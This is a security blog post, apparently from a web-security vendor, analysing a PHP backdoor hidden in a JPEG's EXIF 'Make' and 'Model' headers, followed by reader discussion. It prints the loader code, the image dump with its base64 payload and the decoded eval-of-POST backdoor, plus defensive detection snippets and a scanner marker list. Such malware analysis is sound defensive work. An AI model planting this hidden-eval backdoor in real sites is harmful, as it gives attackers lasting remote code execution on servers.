Malware Hidden Inside JPG EXIF Headers

A few days ago, Peter Gramantik from our research team found a very interesting backdoor on a compromised site. This backdoor didn’t rely on the normal patterns to hide its content (like base64/gzip encoding), but stored its data in the EXIF headers of a JPEG image. It also used the exif_read_data and preg_replace PHP functions to read the headers and execute itself.

Technical Details

The backdoor is divided into two parts. The first part combines the exif_read_data function, which reads the image headers, with the preg_replace function, which executes the content. This is what we found on the compromised site:

$exif = exif_read_data('/homepages/clientsitepath/images/stories/food/bun.jpg');
preg_replace($exif['Make'],$exif['Model'],'');


Both functions are harmless by themselves. exif_read_data is commonly used to read image metadata, and preg_replace to search and replace within strings. However, preg_replace has a hidden and tricky option: if the pattern carries the “/e” modifier, it executes the replacement as PHP code (eval) instead of just searching and replacing.
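As a rough illustration of what to look for, the sketch below checks whether a pattern string ends in a modifier list that contains "e". The helper name pattern_has_eval_modifier is hypothetical and not part of PHP or of the code found on the site. Note that the /e modifier was deprecated in PHP 5.5.0 and removed in PHP 7.0.0, so this check matters mostly when auditing code that runs on older PHP versions.

```php
<?php
// Hypothetical helper (an assumption for illustration, not from the article):
// reports whether a PCRE pattern string, as it would be passed to
// preg_replace(), carries the "e" modifier after its closing delimiter.
function pattern_has_eval_modifier(string $pattern): bool
{
    // PHP skips leading whitespace before the opening delimiter.
    $pattern = ltrim($pattern);
    if ($pattern === '') {
        return false;
    }

    $open = $pattern[0];
    // A delimiter cannot be alphanumeric or a backslash.
    if (ctype_alnum($open) || $open === '\\') {
        return false;
    }

    // Bracket-style delimiters close with their matching counterpart.
    $pairs = ['(' => ')', '[' => ']', '{' => '}', '<' => '>'];
    $close = $pairs[$open] ?? $open;

    $end = strrpos($pattern, $close);
    if ($end === false || $end === 0) {
        return false; // No closing delimiter found.
    }

    // Everything after the closing delimiter is the modifier list.
    $modifiers = (string) substr($pattern, $end + 1);
    return strpos($modifiers, 'e') !== false;
}

var_dump(pattern_has_eval_modifier('/.*/e')); // the value found in the "Make" header
var_dump(pattern_has_eval_modifier('/.*/i'));
```

A check like this only inspects a pattern string once you already have it. In the backdoor described here the pattern arrives at runtime from the image, which is why any preg_replace call with a non-literal first argument deserves a closer look.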

When we look at the bun.jpg file, we find the second part of the backdoor:

ÿØÿà^@^PJFIF^@^A^B^@^@d^@d^@^@ÿá^@¡Exif^@^@II*^@
^H^@^@^@^B^@^O^A^B^@^F^@^@^@&^@^@^@^P^A^B^@m^@^@^@,^@^@^@^@^@^@^@/.*/e^
@ eval ( base64_decode("aWYgKGl zc2V0KCRfUE9TVFsie noxIl0pKSB7ZXZhbChzd
HJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30='));
@ÿì^@^QDucky^@^A^@^D^@^@^@<^@^@ÿî^@^NAdobe^

The file starts normally with the common headers, but the "Make" header contains a strange value: "/.*/e". That is a pattern that matches anything, carrying the exact modifier that makes preg_replace execute (eval) the replacement passed to it.

Now things are getting interesting...

If we keep looking at the EXIF data, we can see the "eval ( base64_decode" hidden inside the "Model" header. When you put it all together, we can see what is going on. The attackers are reading both the Make and Model headers from the EXIF data and passing them to preg_replace. Once we substitute $exif['Make'] and $exif['Model'] with what is in the file, we get the final backdoor:

preg_replace ("/.*/e", '@ eval ( base64_decode("aWYgKGl ...', '');

Once decoded, we can see that it just executes whatever content is provided by the POST variable zz1. The full decoded backdoor is here:

if (isset( $_POST["zz1"])) { eval (stripslashes( $_POST["zz1"]..
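For readers who want to check the decoding themselves, here is a minimal sketch that decodes the Base64 text from the bun.jpg dump without executing it. It assumes the spaces and line breaks inside the encoded text are display artifacts of the dump, so it strips them first. The variable names are illustrative.

```php
<?php
// Base64 text copied from the dump of bun.jpg shown earlier. The spaces and
// the line break are assumed to be display artifacts and are removed below.
$encoded = 'aWYgKGl zc2V0KCRfUE9TVFsie noxIl0pKSB7ZXZhbChzd'
         . 'HJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30=';

$clean = preg_replace('/\s+/', '', $encoded);

// Strict mode makes base64_decode() return false on invalid characters
// instead of silently skipping them.
$decoded = base64_decode($clean, true);

// Print the payload as text only. Never pass it to eval().
echo $decoded, PHP_EOL;
```

The printed text should be consistent with the truncated listing above: a check for the zz1 POST variable followed by an eval of its contents.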

Steganography Malware

Another interesting point is that bun.jpg and the other compromised images still load and work properly. In fact, on these compromised sites, the attackers modified a legitimate, pre-existing image from the site. This is a curious steganographic way to hide the malware.
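Because the images keep rendering normally, one way to look for this kind of hiding place is to search the raw bytes of image files for strings that have no business being there. The sketch below is a minimal example of that idea. The function names and the marker list are assumptions made for illustration; the list is not a complete signature set, it will produce false positives, and it is not how any particular scanner works.

```php
<?php
// Hypothetical helper: returns the names of suspicious markers found in the
// raw bytes of a file. The marker list is illustrative, not exhaustive.
function find_suspicious_markers(string $bytes): array
{
    $markers = [
        'eval call'       => '/\beval\s*\(/i',
        'base64_decode'   => '/base64_decode\s*\(/i',
        'PCRE e modifier' => '~/\.\*/[a-z]*e~i',
        'PHP open tag'    => '/<\?php/i',
    ];

    $hits = [];
    foreach ($markers as $name => $regex) {
        if (preg_match($regex, $bytes) === 1) {
            $hits[] = $name;
        }
    }
    return $hits;
}

// Hypothetical helper: walks a directory tree and reports JPEG files whose
// bytes contain at least one marker, keyed by file path.
function scan_images(string $dir): array
{
    $report = [];
    $files = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($files as $file) {
        if (!preg_match('/\.jpe?g$/i', $file->getFilename())) {
            continue;
        }
        $bytes = (string) file_get_contents($file->getPathname());
        $hits = find_suspicious_markers($bytes);
        if ($hits !== []) {
            $report[$file->getPathname()] = $hits;
        }
    }
    return $report;
}
```

Calling scan_images() on a site's image directory returns an array of flagged paths and the markers found in each. A hit is a reason to inspect the file by hand, not proof of compromise, and a clean result does not rule out other encodings.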

Note: Any Sucuri client using Server Side Scanning is protected against this type of injection (we detect it).


Questions about this attack type? Leave a comment below, we'd love to hear from you!

76 comments
    1. No, it will not. It is a backdoor and only found by our server side scanner (only available to paid customers).

      1. Only? Or just anyone who searches through their jpg and jpeg files (or any file for that matter, but the number of false positives will go up) for the strings “/.*/e” || “eval” || “base64” || “decode”?

        1. I’ve seen these kind of malicious JPG files being detected by AV software when the website is loaded. The only problem is that, by the time the AV has been able to act and delete the JPG file, the zz1 variable has already been executed and if the AV does not detect whatever this new execution does, the visitor can be owned.

          Even though the websites where these images are stored may not have a lot of visitors, the attackers probably use Blackhat SEO to make their specific images appear with a higher ranking in Google Images search.

  1. Nice find, next time I’ll blog about it 🙂 I’ve seen this backdoor hiding in JPEG’s for the last weeks, but only occasionally and on hacked Joomla sites, not WordPress (yet)

    //Edit: typo

    1. Please share what you have found. If you can send those samples to me I would love to take a look.

  2. Forgive me for my technical ignorance, but does this mean that a nefarious individual could go out and commission some pro photographs, load them with this, then release them as Creative Commons free to use – then wait 6 months until everyone is using them on their site, then activate the code?

    1. Not really, at least not easily. They would still need the first part of the backdoor to actually load that image file and execute the content. But, it won’t surprise me if someone comes with a crazy idea like that 🙂

    2. Not really. Actually all this “malware” is doing is using a JPEG to hide its executable content from investigator’s eyes. It could use a plain text file for the same purposes, except that would be more obvious.

      This is a long way from code injection purely through a JPEG file. As I read the article, the part of the site that has really been compromised is the insertion of the preg_replace code. Without that, the EXIF data is just noise.

      1. What about having java, flash, html5 or such load the infected jpegs and by that bypass any IDS/IPS’es on the road to load something at the client side?

        1. Java, flash and html5 “shouldn’t” have any client side functions that allow execution of arbitrary untrusted code from any source. That is not to say there couldn’t be an unknown vulnerability, but again, this would be an issue with code injection, not the JPEG itself.

    1. They don’t. They just use, or better to say _misuse_ this function as it is by design.

    2. I think the answer would be that malware has added this code through some other vulnerability. (I doubt an open source project, like say WordPress, has a preg_replace use susceptible to this.) The information to take away from this post is that there is something else to scan your .php scripts for besides the typical eval(), etc., when looking for malware.

      1. Ok I think I get it. If you were to install some random script you found on the internet, someone could hide this in there and use it at some point later to inject arbitrary code.

      2. You are correct. These are injected through other exploits, including access to the admin user through brute force. Usually another shell is auto-uploaded to 404.php or index.php of the current theme and then these injections are applied. They’ve also been found to have been re-uploaded through FTP.

  3. Everyone should be sanitizing variables if they’re going to be shoved willy-nilly into a preg_replace call. This is really no different than SQL injection (except it’s PHP injection). I also wonder why preg_replace was being used at all, since the EXIF data is not a regular expression search pattern (or at least it shouldn’t be, or you wind up with stuff like this). If it’s not regex, good ol’ str_replace is perfectly fine.

    1. The article mentioned this is a backdoor. Which means the attackers already had access to the system, which allowed them to change the bun.jpg and put the PHP code somewhere in source.

    1. To install such a backdoor, the attacker must have had some access to the server. In that case, it doesn’t matter if the website is in PHP, Ruby, Node, or any other language, they can basically do anything they want. For all we know, they got access to the server from a ssh password written on a post-it, or from a vulnerability in Apache, so again completely unrelated to PHP.

      1. Unless “bun.jpg” was perhaps a user uploadable icon or similar uploadable jpg.

        1. No, they modified existing images directly on the server: “In fact, on these compromised sites, the attackers modified a legit, pre-existent image from the site.”

        2. You can read the original Author’s response to my comment. This was not an external attack… The site was already compromised. This backdoor allows an attacker to have a backdoor into the system via a hidden web shell.

          As an attacker, this is pretty nice, since there is no connect back which would leave a crumb trail to find the attacker. Anyone with Tor or other proxies need to hit the site and issue those commands, making their access virtually unnoticeable.

          I’ve used similar tactics on my Red Team assessments.

      2. ” It also used the exif_read_data and preg_replace PHP functions to read the headers and execute itself.” First paragraph, line 3.

        1. So you mean if it had been written in something else than PHP, the attackers could not have done anything? Even with full access to the server? Well I’m not a big fan of PHP but blaming the language in this particular case makes no sense – with server access, the attackers could have done anything they wanted.

    2. It’s not PHP, it’s the developer who built a weak application/system that the hacker could break into and plant a malware-infected image.

    1. Lazy, lazy response, particularly given the /e flag is not relegated to PHP. It exists in Perl as well as others.

      1. It is very much related to PHP because somebody decided to implement it in PHP. The fact that a bad feature exists in something else is not an excuse to have it in your software.

        1. Nobody said it wasn’t “related” to PHP, but blaming “PHP programmers” is pretty stupid here. Again, “eval” functions exist in every interpreted language; if it’s a bad feature in PHP, it’s a bad feature everywhere.

          Put another way, this is essentially code injection in a similar fashion to SQL injection. Would you blame Python if someone didn’t properly sanitize user input? Of course not. That’s like blaming the hammer when you miss the nail by 6 inches.

          1. I would blame the programmer for not properly sanitizing their inputs.

            However, I think there are more sloppy PHP programmers out there than sloppy Python or Perl programmers.

            Either way this is a good finding and should be on everyone’s mind when looking for bad things on a possibly compromised server (among the other gazillion bad things :P).

          2. In this case I suspect the programmer responsible for not properly sanitizing the input had intended just that. This is a backdoor – He’s not exploiting existing code, he was already in the system and put this backdoor in himself and used the jpeg to hide it.

            Like criticizing the thief for leaving the door broken so he could get back in the next night 😛

  4. To be honest the EXIF headers are more or less irrelevant here – the input could be from anything. The problem is using preg_replace with untrusted input, although I should probably blame both whoever wrote that code and PHP itself for making it so easy to shoot yourself in the foot.

    1. It should be clear that it’s bad to pass untrusted input into the first parameter of preg_replace. We routinely do something like preg_replace('/[^a-zA-Z0-9]/', '', $_REQUEST['param']) to clean user input.

      p.s. With great power, comes great responsibility.

        1. …or not use regexp to begin with if all you want is a simple str_replace().

          1. Which again boils down to the sloppy/lazy PHP-programmer 😉

            As you said – there is no need for preg_whatever in most situations where a simple str_replace will do the job and most likely be far more secure (and also most likely faster to perform).

          2. Oh the irony of lazy being the least laziest programmer to reply – and no offense to the rest of you, but I would be leaning towards feeding you to the wolves if you were on one of my dev teams (or at the very least, QA would be).

            Please don’t confuse “secure code” with “good code” – you’re littering your code bases with assumptions that are going to cause massive problems for someone in the future…

            I don’t expect every programmer to know absolutely everything about the programming language or system that we’re working on (that’s where TLs and QA departments come in to play), but obviously something is wrong if any code similar to what’s been posted here is actually pushed to production (without justification).

            No, you’re not allowed to corrupt data under the justification that it’s secure. Are valid input strings always going to be alphanumeric? And thanks to loose typing, are you even going to be passed a string to begin with?

            That might work in your head, it might even work in the limited testing that you’re doing during development (i.e. does this even work under ideal conditions) but ¿y español? 或中文?

            In the real world we deal with all kinds of data, encoded in all kinds of way. Sure, str_replace() might be a quick and dirty solution to a given problem, but if you corrupt my multibyte dataset then I hope you have something better than “it was more secure and faster to perform” to justify the mistake.

            That said, preg_quote($input) isn’t always going to be enough when dealing with PCRE functions either. There’s that pesky optional $delimiter argument that most people are too lazy to use …

            There’s a reason why we need to have development policies, code style guidelines, documentation and management – simple bugs can be very costly bugs.

          3. Well, using a function that you don’t actually need and whose behavior you don’t understand is as far as you can get from “secure coding”.

            The fact is that there are way more security holes in PHP-based web applications today than previously, and I strongly believe that sloppy programmers are a big part of this soup. There are other reasons as well. However, it would otherwise be hard to explain why there are so many holes in, let’s say, WordPress (if it’s not a hole in WordPress itself then it’s a hole in one of its PHP-coded plugins).

            I mean how hard can it get to code properly? (famous last words 😉

          4. Unless I’m a nefarious hacker that has already compromised your system and I want to leave a backdoor.

            Really. Attention to detail….

            Of course he’s probably sitting there chuckling, ‘Look at these guys, they think it was the programmer, they don’t even suspect me…’

  5. The post leaves a little ambiguity on the attack. A lot of people leaving comments seem to think this is some injection attack.

    From my take, this is a backdoor. I take it the attacker already had access to the system (from some other vulnerability) and replaced the bun.jpg with the modified EXIF headers. The attacker also put the PHP code into some source where it’s executed. This allows the attacker to issue system commands remotely at any time. Even after they patch his initial entry-point.

    Daniel Cid is this accurate? Or did the attacker magically know (this might have been an open-source application) that preg_replace is used this way?

    1. Yes, 100% accurate. It is a backdoor added after the attackers got access to the site.

  6. Slightly off-topic but any suggestions on recommended resources for a beginner learning PHP. Recently one of my sites was hacked and I feel it is about time I develop a better understanding of the programming language.

  7. As stated by others, there’s no reason this can’t be extended to hiding code anywhere, in any type of file that is valid, like the “iTXt”, “tEXt”, or slightly more insidious “zTXt” chunks of a PNG file, hidden in an audio format stream, etc.

    Interesting way to hide your payload code. I suppose if there was some file integrity checking (a la tripwire/aide) on the system in question hosting the picture it *might* have raised flags, but even a .jpg can be expected to change on a website so it might escape the cursory glance of a nightly report.

    Not being terribly PHP savvy, the hosted picture wouldn’t have to be on the same host, but hosted elsewhere and loaded through a URL call.. Even that could escape a nightly report, with some dev’s loading offsite code like jQuery..
    Probably the only real protection while using PHP would be to disable some functions, like eval or preg_*() via php.ini or use the hardened PHP Project, Suhosin, which does remove the e from preg*

    1. Also I wonder how many IDS/IPS systems out there would warn that the jpg/jpeg that just flashed by on the wire contained something odd in its EXIF area (or for that matter as you mentioned a png file containing stuff in the iTXt, tEXt or zTXt)?

      1. I think it would be hard to do, because the system would have to examine every data stream, and would likely take a decent performance hit attempting to do that (not everything is plain text code, compressed shell code, etc).
        I suppose the idea is the IPS/IDS would detect the intrusion (if properly configured) before the black hat in question has a chance to modify a system before pulling down the payload. There’s just too many ways to hide one. However there’s always a breadcrumb trail to follow if you know how and where to look.

  8. Sorry for being a complete n00b. Do you mean to say that the malware ridden image was uploaded to a site that allowed execution and hence providing a backdoor for the attacker?

  9. I don’t get it… only sites compromised, where the attacker can modify the php codes are vulnerable… so he can put whatever he wants to execute code in the source code… even a system()… this is a very localized vulnerability…

  10. Couldn’t this method also be used to tunnel through “next generation firewalls”?

    That is, as soon as the firewall admin allows the client to browse the internet (using http), even if various http-tunnel techniques are blocked, this one will pass, since jpegs would of course be allowed to be downloaded through http (as well as POSTed back to the server which is running the tunneling client)?

  11. Very nice article. I learned a lot from it, including a few methods (e.g. base64, gzip, HTTP compression, etc.). I learned a lot more than just the theory. Thanks.

  12. Sanitising the inputs wouldn’t have helped since the attacker could just disable that part of the code. The main interesting thing in this attack is the use of a little-used option to make a seemingly innocuous call to preg_replace execute code. However, having a hard coded path to an image is unusual and would probably draw attention to that part of the code.

  13. In the cited fragment of EXIF header the opening ” is matched by ‘, not “.

    In the explanation later on, there are three opening brackets and one closing.

  14. It is all based on a command shell in an image, a simple PHP function for defacing websites. I have only seen this virus used by a hacker called Hmei7. This guy defaces websites, etc., and only does it for fun and power. But I would like to understand properly how it all works, since I can get hold of it.

  15. We’ve been seeing this in our IPS from users hitting various external websites. It’s just triggering on ‘base64_decode’ in the .jpg. When I decoded it, and googled, I got this post. So all our alert is indicating is a compromised webserver on the internet, not malicious activity against our internal users?

  16. Is this malware operating system dependent, or because it runs PHP code (presumably in a server environment) is it OS independent?

  17. This post really provides exclusive information, and I appreciate everything you have written in your blog. Thanks for your informative post.

  18. I appreciate all the hard research concerning this form of attack on a server, but there are no working examples of the code demonstrating how it works, so this is still all theory. What I have found is there are a lot of posts describing this (theoretical) attack, but until I can test this out on my current server to see if there is a security flaw, I will conclude that this is all it is.
    I have found several image files with the EXIF modified with the PHP code, and I have also found several on the site I host with the obfuscation, but I am yet to understand how 1. They reverse the obfuscation without having a script to reverse it, and 2. How they make a call to the EXIF coding and run the script.
    This may be my issue, but each file I have discovered uploaded to my site with these modifications, I have then taken them and used a test bed server to see if I could run the code from the browser by accessing the image file directly by using the gif extension or changing it to php.
    On all my tests, I have not been able to replicate what everyone is talking about. This tells me that there has to be a high level of coding for the site that assumes many features are turned on or even installed on the Linux server.
    Again, I appreciate the post, and the theoretical debate on how this could happen, and should happen, but without detailed examples showing this is possible it is nothing more than a potential threat and nothing more.

Comments are closed.
